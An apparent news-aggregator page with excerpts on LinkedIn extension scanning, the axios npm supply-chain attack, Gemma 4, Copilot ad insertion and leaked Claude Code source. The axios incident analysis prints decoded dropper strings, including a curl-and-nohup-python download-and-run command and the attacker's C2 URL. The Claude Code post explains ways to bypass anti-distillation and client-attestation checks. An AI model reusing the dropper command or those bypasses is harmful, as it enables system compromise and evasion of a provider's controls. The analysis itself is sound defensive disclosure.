10 interesting stories served every morning and every evening.




1 1,792 shares, 60 trendiness

LinkedIn Is Illegally Searching Your Computer

Every time any of LinkedIn’s one bil­lion users vis­its linkedin.com, hid­den code searches their com­puter for in­stalled soft­ware, col­lects the re­sults, and trans­mits them to LinkedIn’s servers and to third-party com­pa­nies in­clud­ing an American-Israeli cy­ber­se­cu­rity firm.

The user is never asked. Never told. LinkedIn’s pri­vacy pol­icy does not men­tion it.

Because LinkedIn knows each user’s real name, em­ployer, and job ti­tle, it is not search­ing anony­mous vis­i­tors. It is search­ing iden­ti­fied peo­ple at iden­ti­fied com­pa­nies. Millions of com­pa­nies. Every day. All over the world.

Fairlinked e. V. is an as­so­ci­a­tion of com­mer­cial LinkedIn users. We rep­re­sent the pro­fes­sion­als who use LinkedIn, the busi­nesses that in­vest in and de­pend on the plat­form, and the tool­mak­ers who build prod­ucts for it.

BrowserGate is our in­ves­ti­ga­tion and cam­paign to doc­u­ment one of the largest cor­po­rate es­pi­onage and data breach scan­dals in dig­i­tal his­tory, to in­form the pub­lic and reg­u­la­tors, to col­lect ev­i­dence, and to raise funds for the le­gal pro­ceed­ings re­quired to stop it.

LinkedIn’s scan re­veals the re­li­gious be­liefs, po­lit­i­cal opin­ions, dis­abil­i­ties, and job search ac­tiv­ity of iden­ti­fied in­di­vid­u­als. LinkedIn scans for ex­ten­sions that iden­tify prac­tic­ing Muslims, ex­ten­sions that re­veal po­lit­i­cal ori­en­ta­tion, ex­ten­sions built for neu­ro­di­ver­gent users, and 509 job search tools that ex­pose who is se­cretly look­ing for work on the very plat­form where their cur­rent em­ployer can see their pro­file.

Under EU law, this cat­e­gory of data is not reg­u­lated. It is pro­hib­ited. LinkedIn has no con­sent, no dis­clo­sure, and no le­gal ba­sis. Its pri­vacy pol­icy does not men­tion any of this.

LinkedIn scans for over 200 prod­ucts that di­rectly com­pete with its own sales tools, in­clud­ing Apollo, Lusha, and ZoomInfo. Because LinkedIn knows each user’s em­ployer, it can map which com­pa­nies use which com­peti­tor prod­ucts. It is ex­tract­ing the cus­tomer lists of thou­sands of soft­ware com­pa­nies from their users’ browsers with­out any­one’s knowl­edge.

Then it uses what it finds. LinkedIn has al­ready sent en­force­ment threats to users of third-party tools, us­ing data ob­tained through this covert scan­ning to iden­tify its tar­gets.

In 2023, the EU des­ig­nated LinkedIn as a reg­u­lated gate­keeper un­der the Digital Markets Act and or­dered it to open its plat­form to third-party tools. LinkedIn’s re­sponse:

It pub­lished two re­stricted APIs and pre­sented them to the European Commission as com­pli­ance. Together, these APIs han­dle ap­prox­i­mately 0.07 calls per sec­ond. Meanwhile, LinkedIn al­ready op­er­ates an in­ter­nal API called Voyager that pow­ers every LinkedIn web and mo­bile prod­uct at 163,000 calls per sec­ond. In Microsoft’s 249-page com­pli­ance re­port to the EU, the word API ap­pears 533 times. Voyager” ap­pears zero times.

At the same time, LinkedIn ex­panded its sur­veil­lance of the ex­act tools the reg­u­la­tion was de­signed to pro­tect. The scan list grew from roughly 461 prod­ucts in 2024 to over 6,000 by February 2026. The EU told LinkedIn to let third-party tools in. LinkedIn built a sur­veil­lance sys­tem to find and pun­ish every user of those tools.

LinkedIn loads an in­vis­i­ble track­ing el­e­ment from HUMAN Security (formerly PerimeterX), an American-Israeli cy­ber­se­cu­rity firm, zero pix­els wide, hid­den off-screen, that sets cook­ies on your browser with­out your knowl­edge. A sep­a­rate fin­ger­print­ing script runs from LinkedIn’s own servers. A third script from Google ex­e­cutes silently on every page load. All of it en­crypted. None of it dis­closed.

Microsoft has 33,000 em­ploy­ees and a $15 bil­lion le­gal bud­get. We have the ev­i­dence. What we need is peo­ple and fund­ing to hold them ac­count­able.

...

Read the original on browsergate.eu »

2 1,783 shares, 73 trendiness

Malicious Versions Drop Remote Access Trojan

Hijacked main­tainer ac­count used to pub­lish poi­soned ax­ios re­leases in­clud­ing 1.14.1 and 0.30.4. The at­tacker in­jected a hid­den de­pen­dency that drops a cross plat­form RAT. We are ac­tively in­ves­ti­gat­ing and will up­date this post with a full tech­ni­cal analy­sis. StepSecurity hosted a com­mu­nity town hall on this in­ci­dent on April 1st at 10:00 AM PT - YouTube record­ing: https://​youtu.be/​3Hku_svFvosax­ios is the most pop­u­lar JavaScript HTTP client li­brary with over 100 mil­lion weekly down­loads. On March 30, 2026, StepSecurity iden­ti­fied two ma­li­cious ver­sions of the widely used ax­ios HTTP client li­brary pub­lished to npm: ax­ios@1.14.1 and ax­ios@0.30.4. The ma­li­cious ver­sions in­ject a new de­pen­dency, plain-crypto-js@4.2.1, which is never im­ported any­where in the ax­ios source code. Its sole pur­pose is to ex­e­cute a postin­stall script that acts as a cross plat­form re­mote ac­cess tro­jan (RAT) drop­per, tar­get­ing ma­cOS, Windows, and Linux. The drop­per con­tacts a live com­mand and con­trol server and de­liv­ers plat­form spe­cific sec­ond stage pay­loads. After ex­e­cu­tion, the mal­ware deletes it­self and re­places its own pack­age.json with a clean ver­sion to evade foren­sic de­tec­tion.If you have in­stalled ax­ios@1.14.1 or ax­ios@0.30.4, as­sume your sys­tem is com­pro­misedThere are zero lines of ma­li­cious code in­side ax­ios it­self, and that’s ex­actly what makes this at­tack so dan­ger­ous. Both poi­soned re­leases in­ject a fake de­pen­dency, plain-crypto-js@4.2.1, a pack­age never im­ported any­where in the ax­ios source, whose sole pur­pose is to run a postin­stall script that de­ploys a cross-plat­form re­mote ac­cess tro­jan. The drop­per con­tacts a live com­mand-and-con­trol server, de­liv­ers sep­a­rate sec­ond-stage pay­loads for ma­cOS, Windows, and Linux, then erases it­self and re­places its own pack­age.json with a clean de­coy. A de­vel­oper who in­spects their node_­mod­ules folder af­ter the fact will find no in­di­ca­tion any­thing went wrong.This was not op­por­tunis­tic. It was pre­ci­sion. The ma­li­cious de­pen­dency was staged 18 hours in ad­vance. Three pay­loads were pre-built for three op­er­at­ing sys­tems. Both re­lease branches were poi­soned within 39 min­utes of each other. Every ar­ti­fact was de­signed to self-de­struct. Within two sec­onds of npm in­stall, the mal­ware was al­ready call­ing home to the at­tack­er’s server be­fore npm had even fin­ished re­solv­ing de­pen­den­cies. This is among the most op­er­a­tionally so­phis­ti­cated sup­ply chain at­tacks ever doc­u­mented against a top-10 npm pack­age.These com­pro­mises were de­tected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have re­spon­si­bly dis­closed the is­sue to the pro­ject main­tain­ers.StepSe­cu­rity Harden-Runner, whose com­mu­nity tier is free for pub­lic re­pos and is used by over 12,000 pub­lic repos­i­to­ries, de­tected the com­pro­mised ax­ios pack­age mak­ing anom­alous out­bound con­nec­tions to the at­tack­er’s C2 do­main across mul­ti­ple open source pro­jects. For ex­am­ple, Harden-Runner flagged the C2 call­back to sfr­clak.com:8000 dur­ing a rou­tine CI run in the back­stage repos­i­tory, one of the most widely used de­vel­oper por­tal frame­works. The Backstage team has con­firmed that this work­flow is in­ten­tion­ally sand­boxed and the ma­li­cious pack­age in­stall does not im­pact the pro­ject. The con­nec­tion was au­to­mat­i­cally marked as anom­alous be­cause it had never ap­peared in any prior work­flow run. Harden-Runner in­sights for com­mu­nity tier pro­jects are pub­lic by de­sign, al­low­ing any­one to ver­ify the de­tec­tion: https://​app.stepse­cu­rity.io/​github/​back­stage/​back­stage/​ac­tions/​runs/​23775668703?tab=net­work-events

[Community Webinar] ax­ios Compromised on npm: What We Know, What You Should Do

Watch the StepSecurity com­mu­nity brief­ing on the ax­ios sup­ply chain at­tack. We walk through the full at­tack chain, in­di­ca­tors of com­pro­mise, re­me­di­a­tion steps, and an­swer com­mu­nity ques­tions.

Watch the record­ing on YouTube →

The at­tack was pre-staged across roughly 18 hours, with the ma­li­cious de­pen­dency seeded on npm be­fore the ax­ios re­leases to avoid brand-new pack­age” alarms from se­cu­rity scan­ners:

plain-crypto-js@4.2.0 pub­lished by nr­wise@pro­ton.me — a clean de­coy con­tain­ing a full copy of the le­git­i­mate crypto-js source, no postin­stall hook. Its sole pur­pose is to es­tab­lish npm pub­lish­ing his­tory so the pack­age does not ap­pear as a zero-his­tory ac­count dur­ing later in­spec­tion.

plain-crypto-js@4.2.1 pub­lished by nr­wise@pro­ton.me — ma­li­cious pay­load added. The postin­stall: node setup.js” hook and ob­fus­cated drop­per are in­tro­duced.

ax­ios@1.14.1 pub­lished by com­pro­mised ja­son­saay­man ac­count (email: if­stap@pro­ton.me) — in­jects plain-crypto-js@4.2.1 as a run­time de­pen­dency, tar­get­ing the mod­ern 1.x user base.

ax­ios@0.30.4 pub­lished by the same com­pro­mised ac­count — iden­ti­cal in­jec­tion into the legacy 0.x branch, pub­lished 39 min­utes later to max­i­mize cov­er­age across both re­lease lines.

npm un­pub­lishes ax­ios@1.14.1 and ax­ios@0.30.4. Both ver­sions are re­moved from the reg­istry and the lat­est dist-tag re­verts to 1.14.0. ax­ios@1.14.1 had been live for ap­prox­i­mately 2 hours 53 min­utes; ax­ios@0.30.4 for ap­prox­i­mately 2 hours 15 min­utes. Timestamp is in­ferred from the ax­ios reg­istry doc­u­men­t’s mod­i­fied field (03:15:30Z) — npm does not ex­pose a ded­i­cated per-ver­sion un­pub­lish time­stamp in its pub­lic API.

npm ini­ti­ates a se­cu­rity hold on plain-crypto-js, be­gin­ning the process of re­plac­ing the ma­li­cious pack­age with an npm se­cu­rity-holder stub.

npm pub­lishes the se­cu­rity-holder stub plain-crypto-js@0.0.1-se­cu­rity.0 un­der the npm@npmjs.com ac­count, for­mally re­plac­ing the ma­li­cious pack­age on the reg­istry. plain-crypto-js@4.2.1 had been live for ap­prox­i­mately 4 hours 27 min­utes. Attempting to in­stall any ver­sion of plain-crypto-js now re­turns the se­cu­rity no­tice.

The at­tacker com­pro­mised the ja­son­saay­man npm ac­count, the pri­mary main­tainer of the ax­ios pro­ject. The ac­coun­t’s reg­is­tered email was changed to if­stap@pro­ton.me — an at­tacker-con­trolled ProtonMail ad­dress. Using this ac­cess, the at­tacker pub­lished ma­li­cious builds across both the 1.x and 0.x re­lease branches si­mul­ta­ne­ously, max­i­miz­ing the num­ber of pro­jects ex­posed.Both ax­ios@1.14.1 and ax­ios@0.30.4 are recorded in the npm reg­istry as pub­lished by ja­son­saay­man, mak­ing them in­dis­tin­guish­able from le­git­i­mate re­leases at a glance. Both ver­sions were pub­lished us­ing the com­pro­mised npm cre­den­tials of a lead ax­ios main­tainer, by­pass­ing the pro­jec­t’s nor­mal GitHub Actions CI/CD pipeline.A crit­i­cal foren­sic sig­nal is vis­i­ble in the npm reg­istry meta­data. Every le­git­i­mate ax­ios 1.x re­lease is pub­lished via GitHub Actions with npm’s OIDC Trusted Publisher mech­a­nism, mean­ing the pub­lish is cryp­to­graph­i­cally tied to a ver­i­fied GitHub Actions work­flow. ax­ios@1.14.1 breaks that pat­tern en­tirely — pub­lished man­u­ally via a stolen npm ac­cess to­ken with no OIDC bind­ing and no git­Head:// ax­ios@1.14.0 — LEGITIMATE

_npmUser”: {

name”: GitHub Actions”,

email”: npm-oidc-no-re­ply@github.com,

trustedPublisher”: {

id”: github”,

oidcConfigId”: oidc:9061ef30-3132-49f4-b28c-9338d192a1a9″

// ax­ios@1.14.1 — MALICIOUS

_npmUser”: {

name”: jasonsaayman”,

email”: if­stap@pro­ton.me

// no trust­ed­Pub­lisher, no git­Head, no cor­re­spond­ing GitHub com­mit or tag

}There is no com­mit or tag in the ax­ios GitHub repos­i­tory that cor­re­sponds to 1.14.1. The re­lease ex­ists only on npm. The OIDC to­ken that le­git­i­mate re­leases use is ephemeral and scoped to the spe­cific work­flow — it can­not be stolen. The at­tacker must have ob­tained a long-lived clas­sic npm ac­cess to­ken for the ac­count.Be­fore pub­lish­ing the ma­li­cious ax­ios ver­sions, the at­tacker pre-staged plain-crypto-js@4.2.1 from ac­count nr­wise@pro­ton.me. This pack­age:Mas­quer­ades as crypto-js with an iden­ti­cal de­scrip­tion and repos­i­tory URL point­ing to the le­git­i­mate brix/​crypto-js GitHub repos­i­to­ryCon­tains postinstall”: node setup.js” — the hook that fires the RAT drop­per on in­stall­Pre-stages a clean pack­age.json stub in a file named pack­age.md for ev­i­dence de­struc­tion af­ter ex­e­cu­tion­The de­coy ver­sion (4.2.0) was pub­lished 18 hours ear­lier to es­tab­lish pub­lish­ing his­tory - a clean pack­age in the reg­istry that makes nr­wise look like a le­git­i­mate main­tainer.What changed be­tween 4.2.0 (decoy) and 4.2.1 (malicious)A com­plete file-level com­par­i­son be­tween plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 re­veals ex­actly three dif­fer­ences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is iden­ti­cal be­tween the two ver­sions:

The 56 crypto source files are not just sim­i­lar; they are bit-for-bit iden­ti­cal to the cor­re­spond­ing files in the le­git­i­mate crypto-js@4.2.0 pack­age pub­lished by Evan Vosberg. The at­tacker made no mod­i­fi­ca­tions to the cryp­to­graphic li­brary code what­so­ever. This was in­ten­tional: any diff-based analy­sis com­par­ing plain-crypto-js against crypto-js would find noth­ing sus­pi­cious in the li­brary files and would fo­cus at­ten­tion on pack­age.json — where the postin­stall hook looks, at a glance, like a stan­dard build or setup task.The anti-foren­sics stub (package.md) de­serves par­tic­u­lar at­ten­tion. After setup.js runs, it re­names pack­age.md to pack­age.json. The stub re­ports ver­sion 4.2.0 — not 4.2.1:// Contents of pack­age.md (the clean re­place­ment stub)

name”: plain-crypto-js”,

version”: 4.2.0″, // ← re­ports 4.2.0, not 4.2.1 — de­lib­er­ate mis­match

description”: JavaScript li­brary of crypto stan­dards.”,

license”: MIT,

author”: { name”: Evan Vosberg”, url”: http://​github.com/​evan­vos­berg },

homepage”: http://​github.com/​brix/​crypto-js,

repository”: { type”: git”, url”: http://​github.com/​brix/​crypto-js.git },

main”: index.js”,

// No scripts” key — no postin­stall, no test

dependencies”: {}

}This cre­ates a sec­ondary de­cep­tion layer. After in­fec­tion, run­ning npm list in the pro­ject di­rec­tory will re­port plain-crypto-js@4.2.0 — be­cause npm list reads the ver­sion field from the in­stalled pack­age.json, which now says 4.2.0. An in­ci­dent re­spon­der check­ing in­stalled pack­ages would see a ver­sion num­ber that does not match the ma­li­cious 4.2.1 ver­sion they were told to look for, po­ten­tially lead­ing them to con­clude the sys­tem was not com­pro­mised.# What npm list re­ports POST-infection (after the pack­age.json swap):

$ npm list plain-crypto-js

mypro­ject@1.0.0

└── plain-crypto-js@4.2.0 # ← re­ports 4.2.0, not 4.2.1

# but the drop­per al­ready ran as 4.2.1

# The re­li­able check is the DIRECTORY PRESENCE, not the ver­sion num­ber:

$ ls node_­mod­ules/​plain-crypto-js

aes.js ci­pher-core.js core.js …

# If this di­rec­tory ex­ists at all, the drop­per ran.

# plain-crypto-js is not a de­pen­dency of ANY le­git­i­mate ax­ios ver­sion.The dif­fer­ence be­tween the real crypto-js@4.2.0 and the ma­li­cious plain-crypto-js@4.2.1 is a sin­gle field in pack­age.json:// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)

name”: crypto-js”,

version”: 4.2.0″,

description”: JavaScript li­brary of crypto stan­dards.”,

author”: Evan Vosberg”,

homepage”: http://​github.com/​brix/​crypto-js,

scripts”: {

test”: grunt” // ← no postin­stall

// plain-crypto-js@4.2.1 (MALICIOUSnr­wise@pro­ton.me)

name”: plain-crypto-js”, // ← dif­fer­ent name, every­thing else cloned

version”: 4.2.1″, // ← ver­sion one ahead of the real pack­age

description”: JavaScript li­brary of crypto stan­dards.”,

author”: { name”: Evan Vosberg” }, // ← fraud­u­lent use of real au­thor name

homepage”: http://​github.com/​brix/​crypto-js, // ← real repo, wrong pack­age

scripts”: {

test”: grunt”,

postinstall”: node setup.js” // ← THE ONLY DIFFERENCE. The en­tire weapon.

}The at­tacker pub­lished ax­ios@1.14.1 and ax­ios@0.30.4 with plain-crypto-js: ^4.2.1” added as a run­time de­pen­dency — a pack­age that has never ap­peared in any le­git­i­mate ax­ios re­lease. The diff is sur­gi­cal: every other de­pen­dency is iden­ti­cal to the prior clean ver­sion.When a de­vel­oper runs npm in­stall ax­ios@1.14.1, npm re­solves the de­pen­dency tree and in­stalls plain-crypto-js@4.2.1 au­to­mat­i­cally. npm then ex­e­cutes plain-crypto-js’s postin­stall script, launch­ing the drop­per.Phan­tom de­pen­dency: A grep across all 86 files in ax­ios@1.14.1 con­firms that plain-crypto-js is never im­ported or re­quire()’d any­where in the ax­ios source code. It is added to pack­age.json only to trig­ger the postin­stall hook. A de­pen­dency that ap­pears in the man­i­fest but has zero us­age in the code­base is a high-con­fi­dence in­di­ca­tor of a com­pro­mised re­lease.The Surgical Precision of the InjectionA com­plete bi­nary diff be­tween ax­ios@1.14.0 and ax­ios@1.14.1 across all 86 files (excluding source maps) re­veals that ex­actly one file changed: pack­age.json. Every other file — all 85 li­brary source files, type de­f­i­n­i­tions, README, CHANGELOG, and com­piled dist bun­dles — is bit-for-bit iden­ti­cal be­tween the two ver­sions.# File diff: ax­ios@1.14.0 vs ax­ios@1.14.1 (86 files, source maps ex­cluded)

DIFFERS: pack­age.json

Total dif­fer­ing files: 1

Files only in 1.14.1: (none)

Files only in 1.14.0: (none)# –- ax­ios/​pack­age.json (1.14.0)

# +++ ax­ios/​pack­age.json (1.14.1)

- version”: 1.14.0″,

+ version”: 1.14.1″,

scripts”: {

fix”: eslint –fix lib/**/*.​js”,

- prepare”: husky”

dependencies”: {

follow-redirects”: ^2.1.0″,

form-data”: ^4.0.1″,

proxy-from-env”: ^2.1.0″,

+ plain-crypto-js”: ^4.2.1″

}Two changes are vis­i­ble: the ver­sion bump (1.14.0 → 1.14.1) and the ad­di­tion of plain-crypto-js. There is also a third, less ob­vi­ous change: the prepare”: husky” script was re­moved. husky is the git hook man­ager used by the ax­ios pro­ject to en­force pre-com­mit checks. Its re­moval from the scripts sec­tion is con­sis­tent with a man­ual pub­lish that by­passed the nor­mal de­vel­op­ment work­flow — the at­tacker edited pack­age.json di­rectly with­out go­ing through the pro­jec­t’s stan­dard re­lease tool­ing, which would have re-added the husky pre­pare script.The same analy­sis ap­plies to ax­ios@0.30.3 → ax­ios@0.30.4:# –- ax­ios/​pack­age.json (0.30.3)

# +++ ax­ios/​pack­age.json (0.30.4)

- version”: 0.30.3″,

+ version”: 0.30.4″,

dependencies”: {

follow-redirects”: ^1.15.4″,

form-data”: ^4.0.4″,

proxy-from-env”: ^1.1.0″,

+ plain-crypto-js”: ^4.2.1″

}Again — ex­actly one sub­stan­tive change: the ma­li­cious de­pen­dency in­jec­tion. The ver­sion bump it­self (from 0.30.3 to 0.30.4) is sim­ply the re­quired npm ver­sion in­cre­ment to pub­lish a new re­lease; it car­ries no func­tional sig­nif­i­cance.setup.js is a sin­gle mini­fied file em­ploy­ing a two-layer ob­fus­ca­tion scheme de­signed to evade sta­tic analy­sis tools and con­fuse hu­man re­view­ers.All sen­si­tive strings — mod­ule names, OS iden­ti­fiers, shell com­mands, the C2 URL, and file paths — are stored as en­coded val­ues in an ar­ray named stq[]. Two func­tions de­code them at run­time:_tran­s_1(x, r) — XOR ci­pher. The key OrDeR_7077” is parsed through JavaScript’s Number(): al­pha­betic char­ac­ters pro­duce NaN, which in bit­wise op­er­a­tions be­comes 0. Only the dig­its 7, 0, 7, 7 in po­si­tions 6–9 sur­vive, giv­ing an ef­fec­tive key of [0,0,0,0,0,0,7,0,7,7]. Each char­ac­ter at po­si­tion r is de­coded as:char­Code XOR key[(7 × r × r) % 10] XOR 333_trans_2(x, r) — Outer layer. Reverses the en­coded string, re­places _ with =, base64-de­codes the re­sult (interpreting the bytes as UTF-8 to re­cover Unicode code points), then passes the out­put through _trans_1.The drop­per’s en­try point is _entry(“6202033″), where 6202033 is the C2 URL path seg­ment. The full C2 URL is: http://​sfr­clak.com:8000/​6202033StepSe­cu­rity fully de­coded every en­try in the stq[] ar­ray. The re­cov­ered plain­text re­veals the com­plete at­tack:stq[0] → child_process” // shell ex­e­cu­tion

stq[1] → os” // plat­form de­tec­tion

stq[2] → fs” // filesys­tem op­er­a­tions

stq[3] → http://​sfr­clak.com:8000/ // C2 base URL

stq[5] → win32” // Windows plat­form iden­ti­fier

stq[6] → darwin” // ma­cOS plat­form iden­ti­fier

stq[12] → curl -o /tmp/ld.py -d pack­ages.npm.org/​pro­duct2 -s SCR_LINK && no­hup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &”

stq[13] → package.json” // deleted af­ter ex­e­cu­tion

stq[14] → package.md” // clean stub re­named to pack­age.json

stq[15] → .exe”

stq[16] → .ps1″

stq[17] → .vbs”The com­plete at­tack path from npm in­stall to C2 con­tact and cleanup, across all three tar­get plat­forms.With all strings de­coded, the drop­per’s full logic can be re­con­structed and an­no­tated. The fol­low­ing is a de-ob­fus­cated, com­mented ver­sion of the _entry() func­tion that con­sti­tutes the en­tire drop­per pay­load. Original vari­able names are pre­served; com­ments are added for clar­ity.// setup.js — de-ob­fus­cated and an­no­tated

// SHA-256: e10b1­fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09

...

Read the original on www.stepsecurity.io »

3 1,659 shares, 57 trendiness

Gemma 4

Our most in­tel­li­gent open mod­els, built from Gemini 3 re­search and tech­nol­ogy to max­i­mize in­tel­li­gence-per-pa­ra­me­ter

Your browser does not sup­port the video tag. Your browser does not sup­port the video tag. A new level of in­tel­li­gence for mo­bile and IoT de­vices Your browser does not sup­port the video tag. Your browser does not sup­port the video tag. Your browser does not sup­port the video tag. Your browser does not sup­port the video tag.A new level of in­tel­li­gence for mo­bile and IoT de­vices Your browser does not sup­port the video tag. Your browser does not sup­port the video tag.

Build au­tonomous agents that plan, nav­i­gate apps, and com­plete tasks on your be­half, with na­tive sup­port for func­tion call­ing. Develop ap­pli­ca­tions with strong au­dio and vi­sual un­der­stand­ing, for rich mul­ti­modal sup­port.Cre­ate mul­ti­lin­gual ex­pe­ri­ences that go be­yond trans­la­tion and un­der­stand cul­tural con­text.Im­prove per­for­mance for spe­cific tasks by train­ing Gemma us­ing your pre­ferred frame­works and tech­niques.Run mod­els on your own hard­ware for ef­fi­cient de­vel­op­ment and de­ploy­ment.

A new level of in­tel­li­gence for mo­bile and IoT de­vice­sAudio and vi­sion sup­port for real-time edge pro­cess­ing. They can run com­pletely of­fline with near-zero la­tency on edge de­vices like phones, Raspberry Pi, and Jetson Nano.

Advanced rea­son­ing for IDEs, cod­ing as­sis­tants, and agen­tic work­flows. These mod­els are op­ti­mized for con­sumer GPUs — giv­ing stu­dents, re­searchers, and de­vel­op­ers the abil­ity to turn work­sta­tions into lo­cal-first AI servers.

Gemma 4 mod­els un­dergo the same rig­or­ous in­fra­struc­ture se­cu­rity pro­to­cols as our pro­pri­etary mod­els. By choos­ing Gemma 4, en­ter­prises and sov­er­eign or­ga­ni­za­tions gain a trusted, trans­par­ent foun­da­tion that de­liv­ers state-of-the-art ca­pa­bil­i­ties while meet­ing the high­est stan­dards for se­cu­rity and re­li­a­bil­ity.

...

Read the original on deepmind.google »

4 1,482 shares, 58 trendiness

copilot edited an ad into my pr

After a team mem­ber sum­moned Copilot to cor­rect a typo in a PR of mine, Copilot edited my PR de­scrip­tion to in­clude and ad for it­self and Raycast.

This is hor­rific. I knew this kind of bull­shit would hap­pen even­tu­ally, but I did­n’t ex­pect it so soon.

Here is how plat­forms die: first, they are good to their users; then they abuse their users to make things bet­ter for their busi­ness cus­tomers; fi­nally, they abuse those busi­ness cus­tomers to claw back all the value for them­selves. Then, they die.

...

Read the original on notes.zachmanson.com »

5 1,318 shares, 54 trendiness

fake tools, frustration regexes, undercover mode, and more

Update: see HN dis­cus­sions about this post: https://​news.ycombi­na­tor.com/​item?id=47586778

I use Claude Code daily, so when Chaofan Shou no­ticed ear­lier to­day that Anthropic had shipped a .map file along­side their Claude Code npm pack­age, one con­tain­ing the full, read­able source code of the CLI tool, I im­me­di­ately wanted to look in­side. The pack­age has since been pulled, but not be­fore the code was widely mir­rored, in­clud­ing my­self and picked apart on Hacker News.

This is Anthropic’s sec­ond ac­ci­den­tal ex­po­sure in a week (the model spec leak was just days ago), and some peo­ple on Twitter are start­ing to won­der if some­one in­side is do­ing this on pur­pose. Probably not, but it’s a bad look ei­ther way. The tim­ing is hard to ig­nore: just ten days ago, Anthropic sent le­gal threats to OpenCode, forc­ing them to re­move built-in Claude au­then­ti­ca­tion be­cause third-party tools were us­ing Claude Code’s in­ter­nal APIs to ac­cess Opus at sub­scrip­tion rates in­stead of pay-per-to­ken pric­ing. That whole saga makes some of the find­ings be­low more pointed.

So I spent my morn­ing read­ing through the HN com­ments and leaked source. Here’s what I found, roughly or­dered by how spicy” I thought it was.

In claude.ts (line 301-313), there’s a flag called ANTI_DISTILLATION_CC. When en­abled, Claude Code sends an­ti_dis­til­la­tion: [‘fake_tools’] in its API re­quests. This tells the server to silently in­ject de­coy tool de­f­i­n­i­tions into the sys­tem prompt.

The idea: if some­one is record­ing Claude Code’s API traf­fic to train a com­pet­ing model, the fake tools pol­lute that train­ing data. It’s gated be­hind a GrowthBook fea­ture flag (tengu_anti_distill_fake_tool_injection) and only ac­tive for first-party CLI ses­sions.

This was one of the first things peo­ple no­ticed on HN.

There’s also a sec­ond anti-dis­til­la­tion mech­a­nism in be­tas.ts (lines 279-298), server-side con­nec­tor-text sum­ma­riza­tion. When en­abled, the API buffers the as­sis­tan­t’s text be­tween tool calls, sum­ma­rizes it, and re­turns the sum­mary with a cryp­to­graphic sig­na­ture. On sub­se­quent turns, the orig­i­nal text can be re­stored from the sig­na­ture. If you’re record­ing API traf­fic, you only get the sum­maries, not the full rea­son­ing chain.

How hard would it be to work around these? Not very. Looking at the ac­ti­va­tion logic in claude.ts, the fake tools in­jec­tion re­quires all four con­di­tions to be true: the ANTI_DISTILLATION_CC com­pile-time flag, the cli en­try­point, a first-party API provider, and the ten­gu_an­ti_dis­til­l_­fake_­tool_in­jec­tion GrowthBook flag re­turn­ing true. A MITM proxy that strips the an­ti_dis­til­la­tion field from re­quest bod­ies be­fore they reach the API would by­pass it en­tirely, since the in­jec­tion is server-side and opt-in. The should­In­clude­First­Par­ty­Only­Be­tas() func­tion also checks for CLAUDE_CODE_DISABLE_EXPERIMENTAL_BETAS, so set­ting that env var to a truthy value dis­ables the whole thing. And if you’re us­ing a third-party API provider or the SDK en­try­point in­stead of the CLI, the check never fires at all. The con­nec­tor-text sum­ma­riza­tion is even more nar­rowly scoped, Anthropic-internal-only (USER_TYPE === ant’), so ex­ter­nal users won’t en­counter it re­gard­less.

Anyone se­ri­ous about dis­till­ing from Claude Code traf­fic would find the workarounds in about an hour of read­ing the source. The real pro­tec­tion is prob­a­bly le­gal, not tech­ni­cal.

The file un­der­cover.ts (about 90 lines) im­ple­ments a mode that strips all traces of Anthropic in­ter­nals when Claude Code is used in non-in­ter­nal re­pos. It in­structs the model to never men­tion in­ter­nal co­de­names like Capybara” or Tengu,” in­ter­nal Slack chan­nels, repo names, or the phrase Claude Code” it­self.

There is NO force-OFF. This guards against model co­de­name leaks.”

You can force it ON with CLAUDE_CODE_UNDERCOVER=1, but there’s no way to force it off. In ex­ter­nal builds, the en­tire func­tion gets dead-code-elim­i­nated to triv­ial re­turns. This is a one-way door.

This means AI-authored com­mits and PRs from Anthropic em­ploy­ees in open source pro­jects will have no in­di­ca­tion that an AI wrote them. Hiding in­ter­nal co­de­names is rea­son­able. Having the AI ac­tively pre­tend to be hu­man is a dif­fer­ent thing.

An LLM com­pany us­ing regexes for sen­ti­ment analy­sis is peak irony, but also: a regex is faster and cheaper than an LLM in­fer­ence call just to check if some­one is swear­ing at your tool.

In sys­tem.ts (lines 59-95), API re­quests in­clude a cch=00000 place­holder. Before the re­quest leaves the process, Bun’s na­tive HTTP stack (written in Zig) over­writes those five ze­ros with a com­puted hash. The server then val­i­dates the hash to con­firm the re­quest came from a real Claude Code bi­nary, not a spoofed one.

They use a place­holder of the same length so the re­place­ment does­n’t change the Content-Length header or re­quire buffer re­al­lo­ca­tion. The com­pu­ta­tion hap­pens be­low the JavaScript run­time, so it’s in­vis­i­ble to any­thing run­ning in the JS layer. It’s ba­si­cally DRM for API calls, im­ple­mented at the HTTP trans­port level.

This is the tech­ni­cal en­force­ment be­hind the OpenCode le­gal fight. Anthropic does­n’t just ask third-party tools not to use their APIs; the bi­nary it­self cryp­to­graph­i­cally proves it’s the real Claude Code client. If you’re won­der­ing why the OpenCode com­mu­nity had to re­sort to ses­sion-stitch­ing hacks and auth plu­g­ins af­ter Anthropic’s le­gal no­tice, this is why.

The at­tes­ta­tion is­n’t air­tight, though. The whole mech­a­nism is gated be­hind a com­pile-time fea­ture flag (NATIVE_CLIENT_ATTESTATION), and the cch=00000 place­holder only gets in­jected into the x-an­thropic-billing-header when that flag is on. The header it­self can be dis­abled en­tirely by set­ting CLAUDE_CODE_ATTRIBUTION_HEADER to a falsy value, or re­motely via a GrowthBook kill­switch (tengu_attribution_header). The Zig-level hash re­place­ment also only works in­side the of­fi­cial Bun bi­nary. If you re­built the JS bun­dle and ran it on stock Bun (or Node), the place­holder would sur­vive as-is: five lit­eral ze­ros hit­ting the server. Whether the server re­jects that out­right or just logs it is an open ques­tion, but the code com­ment ref­er­ences a server-side _parse_cc_header func­tion that tolerates un­known ex­tra fields,” which sug­gests the val­i­da­tion might be more for­giv­ing than you’d ex­pect for a DRM-like sys­tem. Not a push-but­ton by­pass, but not the kind of thing that would stop a de­ter­mined third-party client for long ei­ther.

BQ 2026-03-10: 1,279 ses­sions had 50+ con­sec­u­tive fail­ures (up to 3,272) in a sin­gle ses­sion, wast­ing ~250K API calls/​day glob­ally.”

